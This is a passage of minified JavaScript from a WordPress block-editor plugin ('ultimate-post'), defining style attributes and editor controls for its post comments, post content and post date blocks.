thoughts, idea or write a feedback by clicking here & start an awesome comment"},inputPlaceValueColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-comment-form ::placeholder { color:{{inputPlaceValueColor}} }"}]},inputValueColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-form input,\n          {{ULTP}} .ultp-comment-form textarea { color:{{inputValueColor}} }"}]},inputValueBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea {background-color:{{inputValueBg}}}"}]},inputValueTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea"}]},inputValuePad:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea { padding:{{inputValuePad}} }"}]},inputBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-input textarea"}]},inputHovBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#777",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-form input:hover,{{ULTP}} .ultp-comment-form input:focus,{{ULTP}} .ultp-comment-form textarea:hover, \n          {{ULTP}} .ultp-comment-form textarea:focus"}]},inputRadius:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input, \n          {{ULTP}} .ultp-comment-form textarea{ border-radius:{{inputRadius}} }"}]},inputHovRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-form input:hover, \n          {{ULTP}} .ultp-comment-form textarea:hover{ border-radius:{{inputHovRadius}} }"}]},inputSpacing:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout1"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input,{{ULTP}} .ultp-comment-form > p,{{ULTP}} .ultp-comment-form > input, .oceanwp-theme \n          {{ULTP}} .comment-form-author,  .oceanwp-theme \n          {{ULTP}} .comment-form-email, .oceanwp-theme \n          {{ULTP}} .comment-form-url { margin:{{inputSpacing}} 0px 0px !important;}"},{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout2"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input,{{ULTP}} .ultp-comment-form > p, \n          {{ULTP}} .ultp-comment-form > input { margin:{{inputSpacing}} 0px 0px !important} ;"},{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"layout",condition:"==",value:"layout3"}],selector:"{{ULTP}} .ultp-comment-form > div > label, \n          {{ULTP}} .ultp-comment-form div > p, \n          {{ULTP}} .ultp-comment-input, \n          {{ULTP}} .ultp-comment-form > p, \n          {{ULTP}} .ultp-comment-form > input { margin:{{inputSpacing}} 0px 0px !important;}"}]},inputLabel:{type:"boolean",default:!0},cmntInputText:{type:"string",default:"Comment's",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},nameInputText:{type:"string",default:"Name",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},emailInputText:{type:"string",default:"Email",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}]}]},webInputText:{type:"string",default:"Website Url",style:[{depends:[{key:"inputLabel",condition:"==",value:!0},{key:"disableWebUrl",condition:"==",value:!1}]}]},inputLabelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"inputLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-form label { color:{{inputLabelColor}} }"}]},inputLabelTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{depends:[{key:"inputLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-form label"}]},disableWebUrl:{type:"boolean",default:!1,style:[{depends:[{key:"disableWebUrl",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-website, {{ULTP}} .comment-form-url { display: none !important; }"},{depends:[{key:"disableWebUrl",condition:"==",value:!1}]}]},cookiesEnable:{type:"boolean",default:!0},cookiesText:{type:"string",default:"Save my name, email, and website in this browser for the next time I comment.",style:[{depends:[{key:"cookiesEnable",condition:"==",value:!0}]}]},cookiesColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"cookiesEnable",condition:"==",value:!0}],selector:"{{ULTP}} .comment-form-cookies-consent label { color:{{cookiesColor}} }"}]},subBtnText:{type:"string",default:"Post Comment"},subBtnTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},submitButton:{type:"string",default:"normal"},subBtnColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-comment-btn,{{ULTP}} .form-submit > input#submit { color:{{subBtnColor}} }"}]},subBtnBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},subBtnBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"var(--postx_preset_Primary_color)",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit"}]},subBtnRadius:{type:"object",default:{top:"3",right:"3",bottom:"3",left:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { border-radius:{{subBtnRadius}} }"}]},subBtnHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover { color:{{subBtnHovColor}} }"}]},subBtnHovBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover"}]},subBtnHovBorder:{type:"object",default:{openBorder:1,width:{top:0,right:0,bottom:0,left:0},color:"#151515",type:"solid"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover"}]},subBtnHovRadius:{type:"object",default:{top:"3",right:"3",bottom:"3",left:"3",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn:hover, \n          {{ULTP}} .form-submit > input#submit:hover { border-radius:{{subBtnHovRadius}} }"}]},subBtnPad:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { padding:{{subBtnPad}} }"}]},subBtnSpace:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit { margin:{{subBtnSpace}} 0px 0px}"}]},subBtnAlign:{type:"string",default:"left",style:[{depends:[{key:"subBtnAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-right: auto !important; }"},{depends:[{key:"subBtnAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-left: auto !important; margin-right: auto !important}"},{depends:[{key:"subBtnAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit > input#submit, \n          {{ULTP}} .ultp-comment-btn, \n          {{ULTP}} .form-submit { display: block !important; margin-left:auto !important;}"}]},authColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{selector:"{{ULTP}} .ultp-comment-meta div, \n          {{ULTP}} .comment-author a.url,{{ULTP}} .comment-author .fn {color:{{authColor}} }"}]},authHovColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-comment-meta div:hover,\n          {{ULTP}} .comment-author a.url:hover, \n          {{ULTP}} .comment-author b:hover {color: {{authHovColor}} }"}]},authorTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:25,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-meta div ,\n          {{ULTP}} .comment-author a.url, \n          {{ULTP}} .comment-author b"}]},commentSpace:{type:"object",default:{lg:{top:"15",bottom:"0",left:"30",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-wrapper, \n          {{ULTP}} .children { margin: {{commentSpace}} }"}]},replyText:{type:"string",default:"Comments Text"},commentCount:{type:"boolean",default:!0},commentCountColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-comment-reply-heading {color:{{commentCountColor}} }"}]},commentCountTypo:{type:"object",default:{openTypography:1,size:{lg:30,unit:"px"},height:{lg:28,unit:"px"},weight:"600"},style:[{selector:"{{ULTP}} .ultp-comment-reply-heading"}]},commentCountSpace:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-reply-heading { margin:0px 0px {{commentCountSpace}} }"}]},authMetaSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-comment-content-heading, \n          {{ULTP}} .comment-meta { margin:0px 0px {{authMetaSpace}} }"}]},replyButton:{type:"string",default:"normal"},replyBtnTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a {color: {{replyBtnColor}} }"}]},replyBtnBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnHovColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-reply-btn:hover, \n          {{ULTP}} .comment-body .reply a:hover, \n          {{ULTP}} .comment-reply-link:hover {color: {{replyBtnHovColor}} }"}]},replyBtnBgHov:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-reply-btn:hover, \n          {{ULTP}} .comment-reply-link:hover, \n          {{ULTP}} .comment-body .reply a:hover"}]},replyBtnBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a"}]},replyBtnRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { border-radius:{{replyBtnRadius}}; }"}]},replyBtnPad:{type:"object",default:{lg:{top:"5",bottom:"5",left:"5",right:"5",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { padding:{{replyBtnPad}}; }"}]},replyBtnSpace:{type:"object",default:{lg:"7",unit:"px"},style:[{selector:"{{ULTP}} .ultp-reply-btn, \n          {{ULTP}} .comment-reply-link, \n          {{ULTP}} .comment-body .reply a { margin: {{replyBtnSpace}} 0px}"}]},authMeta:{type:"boolean",default:!0,style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata , \n          {{ULTP}} .comment-meta {display:block}"},{depends:[{key:"authMeta",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata , \n          {{ULTP}} .comment-meta {display:none}"}]},authMetaColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span , \n          {{ULTP}} .comment-metadata a ,\n          {{ULTP}} .comment-meta a { color:{{authMetaColor}} }"}]},authMetaHovColor:{type:"string",default:"",style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span:hover , \n          {{ULTP}} .comment-metadata a:hover ,\n          {{ULTP}} .comment-meta a:hover { color:{{authMetaHovColor}} }"}]},authMetaTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"}},style:[{depends:[{key:"authMeta",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-meta span, \n          {{ULTP}} .comment-metadata a, \n          {{ULTP}} .comment-meta a"}]},authImg:{type:"boolean",default:!0,style:[{depends:[{key:"authImg",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-wrapper .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {display: inline }"},{depends:[{key:"authImg",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {display: none }"}]},authImgRadius:{type:"object",default:{lg:"50",unit:"px"},style:[{depends:[{key:"authImg",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-comment-content-heading > img,\n          {{ULTP}} .comment-author img {border-radius: {{authImgRadius}} }"}]},replyColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-comment-desc,\n          {{ULTP}} .comment-content, \n          {{ULTP}} .comment-body .reply ,\n          {{ULTP}} .comment-body > p { color:{{replyColor}} }"}]},replyHovColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-comment-desc:hover, \n          {{ULTP}} .comment-content:hover, \n          {{ULTP}} .comment-body .reply:hover,\n          {{ULTP}} .comment-body > p:hover {color: {{replyHovColor}} }"}]},replyTypo:{type:"object",default:{openTypography:1,size:{lg:15,unit:"px"},height:{lg:20,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-comment-desc, \n          {{ULTP}} .comment-content, \n          {{ULTP}} .comment-body .reply, \n          {{ULTP}} .comment-body > p"}]},replySeparator:{type:"boolean",default:!0,style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { display: block }"},{depends:[{key:"replySeparator",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { display: none }"}]},replySepColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { background-color:{{replySepColor}} }"}]},replyCancelColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .comment-reply-title a { color:{{replyCancelColor}} !important;  }"}]},replyCancelHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .comment-reply-title a:hover { color:{{replyCancelHoverColor}} !important;  }"}]},replySepSpace:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"replySeparator",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-comment-reply > li:after { margin:{{replySepSpace}} 0px }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},11182:(e,t,l)=>{"use strict";var o=l(67294),a=l(44473),i=l(34701),n=l(50540);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/comments.svg",alt:"Post Comments"}),attributes:i.Z,edit:a.Z,save:()=>null})},65657:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(92637);const{__}=wp.i18n,{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,name:l,attributes:u,clientId:d,className:m,attributes:{blockId:g,advanceId:y,showCap:b,currentPostId:v}}=e,h={setAttributes:t,name:l,attributes:u,clientId:d};(0,n.S)({blockId:g,clientId:d,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(u,"ultimate-post/post-content",g);const f=p({className:`ultp-block-${g} ${m}`,...y&&{id:y}});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"toggle",key:"showCap",label:__("Enable Drop Cap","ultimate-post")}},{data:{type:"toggle",key:"inheritWidth",label:__("Inherit Default Width","ultimate-post")}},{data:{type:"range",key:"contentWidth",step:1,responsive:!0,unit:!0,min:0,max:1e3,label:__("Content Width","ultimate-post")}},{data:{type:"color",key:"descColor",label:__("Text Color","ultimate-post")}},{data:{type:"color",key:"linkColor",label:__("Link Color","ultimate-post")}},{data:{type:"typography",key:"descTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"contentAlign",responsive:!0,label:__("Alignment","ultimate-post"),options:["0 auto 0 0","0 auto","0 0 0 auto"]}}],store:h}),b&&(0,o.createElement)(a.T,{title:__("Drop Cap Style","ultimate-post"),include:[{data:{type:"range",key:"firstCharSize",min:1,max:200,label:__("First Latter Size","ultimate-post")}},{data:{type:"range",key:"firstCharYSpace",min:1,max:300,label:__("Vertical Space","ultimate-post")}},{data:{type:"range",key:"firstCharXSpace",min:1,max:300,label:__("Horizontal Space","ultimate-post")}},{data:{type:"color",key:"firstLatterColor",label:__("Color","ultimate-post")}}],store:h})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:h}),(0,o.createElement)(a.Mg,{pro:!0,store:h}),(0,o.createElement)(a.iv,{store:h}))),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-content"},(0,o.createElement)("p",null,__("Lorem ipsum dolor sit amet, consectetur adipiscing elit. In eget faucibus enim. Vivamus ac dui euismod velit convallis consequat. Aliquam eget malesuada nisi. Etiam mauris neque, varius vel blandit non, imperdiet facilisis eros. Aliquam ac odio id mi cursus posuere. Nunc in ex nec justo iaculis sodales. Donec ullamcorper sem non metus eleifend, sed molestie urna egestas. Vestibulum gravida mattis varius. Vivamus nec nulla mi. Nulla varius quam in lorem molestie posuere.","ultimate-post")),(0,o.createElement)("h2",null,__("Heading 2","ultimate-post")),(0,o.createElement)("h3",null,__("Heading 3","ultimate-post")),(0,o.createElement)("h4",null,__("Heading 4","ultimate-post")),(0,o.createElement)("h5",null,__("Heading 5","ultimate-post")),(0,o.createElement)("h6",null,__("Heading 6","ultimate-post")),(0,o.createElement)("h3",null,__("Ordered List","ultimate-post")),(0,o.createElement)("ol",null,(0,o.createElement)("li",null,__("List Item 1","ultimate-post")),(0,o.createElement)("li",null,__("List Item 2","ultimate-post")),(0,o.createElement)("li",null,__("List Item 3","ultimate-post"))),(0,o.createElement)("h3",null,__("Unordered List","ultimate-post")),(0,o.createElement)("ul",null,(0,o.createElement)("li",null,__("List Item 1","ultimate-post")),(0,o.createElement)("li",null,__("List Item 2","ultimate-post")),(0,o.createElement)("li",null,__("List Item 3","ultimate-post")))))))}},55784:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},inheritWidth:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content { margin:0 auto; max-width: 700px; width:100%;}"}]},contentWidth:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"inheritWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content {margin: 0 auto; max-width:{{contentWidth}}; width:100%}"}]},descColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} >  .ultp-block-wrapper .ultp-builder-content, {{ULTP}} > .ultp-block-wrapper .ultp-builder-content p {color:{{descColor}} ;}"}]},linkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} >  .ultp-block-wrapper .ultp-builder-content a, {{ULTP}} >  .ultp-block-wrapper .ultp-builder-content * a {color:{{linkColor}} ;}"}]},descTypo:{type:"object",default:{openTypography:0,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content, html :where(.editor-styles-wrapper) {{ULTP}} > .ultp-block-wrapper .ultp-builder-content p"}]},contentAlign:{type:"string",default:"0 auto",style:[{depends:[{key:"inheritWidth",condition:"!=",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper .ultp-builder-content {margin:{{contentAlign}} }"}]},showCap:{type:"boolean",default:!1},firstCharSize:{type:"string",default:"110",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {font-size:{{firstCharSize}}px;float:left;}"}]},firstCharXSpace:{type:"string",default:"25",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {margin-right:{{firstCharXSpace}}px;}"}]},firstCharYSpace:{type:"string",default:"100",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {line-height:{{firstCharYSpace}}px;}"}]},firstLatterColor:{type:"string",default:"",style:[{depends:[{key:"showCap",condition:"==",value:!0}],selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-builder-content > p:first-child::first-letter {color:{{firstLatterColor}};}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},13427:(e,t,l)=>{"use strict";var o=l(67294),a=l(65657),i=l(55784),n=l(59943);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/content.svg",alt:"Post Content"}),attributes:i.Z,edit:a.Z,save:()=>null})},43424:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Fragment:u}=wp.element,{dateI18n:d}=wp.date;function m(e){const{setAttributes:t,name:l,attributes:m,clientId:g,className:y,attributes:{blockId:b,advanceId:v,metaDateFormat:h,metaDateIconShow:f,metaDateIconStyle:k,prefixEnable:w,datePubLabel:x,dateUpLabel:T,dateFormat:_,currentPostId:C}}=e,E={setAttributes:t,name:l,attributes:m,clientId:g};(0,s.S)({blockId:b,clientId:g,currentPostId:C,setAttributes:t,checkRef:!1}),b&&(0,n.Kh)(m,"ultimate-post/post-date-meta",b);const S=c({className:`ultp-block-${b} ${y}`,...v&&{id:v}});return(0,o.createElement)(u,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",initialOpen:!0,include:[{data:{type:"group",key:"dateFormat",justify:!0,options:[{label:"Publish Date",value:"publish"},{label:"Updated Date",value:"updated"}],responsive:!1,label:__("Date/Time Format","ultimate-post")}},{data:{type:"toggle",key:"prefixEnable",label:__("Prefix Enable","ultimate-post")}},{data:{type:"text",key:"datePubLabel",label:__("Prefix Published Label","ultimate-post")}},{data:{type:"text",key:"dateUpLabel",label:__("Prefix Update Label","ultimate-post")}},{data:{type:"select",key:"metaDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2022"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2022",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2022 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2022",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]}},{data:{type:"color",key:"metaDateColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"metaDateTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"metaDateCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"color",key:"datePrefixColor",label:__("Prefix Color","ultimate-post")}},{data:{type:"range",key:"datePrefixSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Prefix label Space X","ultimate-post")}}],store:E}),(0,o.createElement)(i.T,{title:__("Icon","ultimate-post"),depend:"metaDateIconShow",include:[{data:{type:"icon",key:"metaDateIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"range",key:"metaDateIconSize",min:0,max:100,responsive:!0,step:1,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"metaDateIconSpace",min:0,max:100,responsive:!0,step:1,unit:["px","em","rem"],label:__("Icon Space X","ultimate-post")}}],store:E})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:E}),(0,o.createElement)(i.Mg,{pro:!0,store:E}),(0,o.createElement)(i.iv,{store:E}))),(0,i.dH)()),(0,o.createElement)("div",S,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-date-meta"},w&&(0,o.createElement)("span",{className:"ultp-date-meta-prefix"},"publish"==_&&x,"updated"==_&&T),f&&(0,o.createElement)("span",{className:"ultp-date-meta-icon"},""!=k&&a.ZP[k]),h&&(0,o.createElement)("span",{className:"ultp-date-meta-format"},d((0,i.De)(h)))))))}},18715:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},prefixEnable:{type:"boolean",default:!1},metaDateIconShow:{type:"boolean",default:!0},dateFormat:{type:"string",default:"updated"},metaDateFormat:{type:"string",default:"M j, Y"},metaDateColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-date-meta-format { color:{{metaDateColor}} }"}]},metaDateTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-date-meta"}]},metaDateCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{metaDateCountAlign}};}"}]},datePubLabel:{type:"string",default:"Publish Date",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"publish"}]}]},dateUpLabel:{type:"string",default:"Updated Date",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0},{key:"dateFormat",condition:"==",value:"updated"}]}]},datePrefixColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"prefixEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-prefix { color:{{datePrefixColor}} }"}]},datePrefixSpace:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"prefixEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-prefix { margin-right: {{datePrefixSpace}} }"}]},metaDateIconStyle:{type:"string",default:"date1",style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon > svg { color:{{iconColor}}; color:{{iconColor}};}"}]},metaDateIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon svg { width:{{metaDateIconSize}}; height:{{metaDateIconSize}} }"}]},metaDateIconSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"metaDateIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-date-meta-icon > svg { margin-right: {{metaDateIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},68425:(e,t,l)=>{"use strict";var 